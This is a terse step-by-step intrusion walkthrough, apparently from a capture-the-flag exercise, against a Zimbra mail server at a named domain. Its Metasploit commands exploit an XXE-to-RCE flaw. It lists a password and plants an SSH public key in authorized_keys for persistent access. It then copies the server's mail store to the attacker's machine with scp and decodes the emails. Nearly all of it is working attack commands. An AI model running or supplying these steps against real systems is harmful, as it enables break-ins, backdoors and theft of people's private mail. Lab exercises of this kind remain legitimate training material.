- Address:
mail.petromaz.ir
- Find vulnerability:
https://www.exploit-db.com/exploits/46693
- Run Metasploit
msfconsole -q
use exploit/linux/http/zimbra_xxe_rce
set RHOST mail.petromaz.ir
set RPORT 443
set LHOST <your-ip>
set LPORT 4747
# -j will run it as a JOB
run
Attention: Password: Zimbra2024
- Check SSH Keys (Create One, if needed)
cd ~/.ssh
ls -la
cat id_rsa.pub
# Create If You Don't Have one
ssh-keygen -t rsa
- Set public Key:
echo "<your-pub-key>" > ~/.ssh/authorized_keys
- Ssh into Server:
ssh -i "<private-key>" [email protected]
- Get Flag: MAZAPA_aee82fac0c8fb5818b26db37a577027c
- Download Zimbra Data
scp -i "<private-key>" -r [email protected]:/opt/zimbra/store/0 ./08-store0
- Check Emails and Decode Files:
https://www.freeformatter.com/base64-encoder.html
- Network Map: 🗂 Network Map